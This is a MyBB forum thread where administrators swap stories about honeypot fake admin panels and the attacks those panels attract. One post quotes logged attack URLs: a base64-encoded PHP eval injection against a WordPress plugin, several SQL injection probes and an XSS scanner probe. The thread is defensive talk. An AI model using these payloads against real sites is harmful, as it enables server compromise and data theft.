MyBB Community Forums

Full Version: This is what I call a hardcore fail
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Now this is what I call a hardcore fail Big Grin

[Image: 20Bw5]

And most funny part is this
(I logged into my email account after a week or two and saw 1K login attempts, most on different days)

[Image: 20Byc]

Have you guys received a bruteforce on your fake ACP before?
I don't have the honey pot ACP installed, but I do receive a lot of automated and non automated hacking attempts.

/topic-register-time-v-1-1?amp%3bsa=U&amp%3bei=cI0UUbyCGqnOiwKlqICoCw&amp%3bved=0CIICEBYwPDjUAg&amp%3busg=AFQjCNFOlPcZIm8kFLm0sNQQWmz5rfPxQA/wp-content/plugins/is-human/engine.php&action=log-reset&type=ih_options()%3beval(base64_decode(JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK))%3berror

/search.php?action=finduser'+and+(1=8+xor+2=10)--+a&uid=8

/forum-forum-showcase?page=2&datecut=0+and+(8=16+xor+4=11)--+a&sortby=rating&order=desc

/printthread.php?tid=24&page=3+and+not+6=12--+a

/topic-mysessions?page=3%22%3E%3Ch1%3EXSS%20DETECTED%20XCode%20Exploit%20Scanner%20-%20www.xcode.or.id%3C/h1%3E%20.html

..and many others. I probably would see a lot of attempts if I did have it installed.
wp-content?

You have wordpress integrated with MyBB?
No - That's one of the automated attacks. I've also got them trying to send evaluated PHP code through my contact form.
Oh lol. I think you should give honeypot ACP a try.
I once tried to login in my Honeypot ACP, lol.
Every time when I upgrade, I have to remember to not upload the files to the honeypot on my board.
(2013-02-11, 02:45 AM)Omar G. Wrote: [ -> ]I once tried to login in my Honeypot ACP, lol.

My case is even worse. I once tried to login into my ACP honeypot for over 10 minutes, and finally realized the real ACP is somewhere else. Sad
Everyone seems to have funny moments with the honeypot ACP.
I always put off installing this, but I'm actually quite tempted.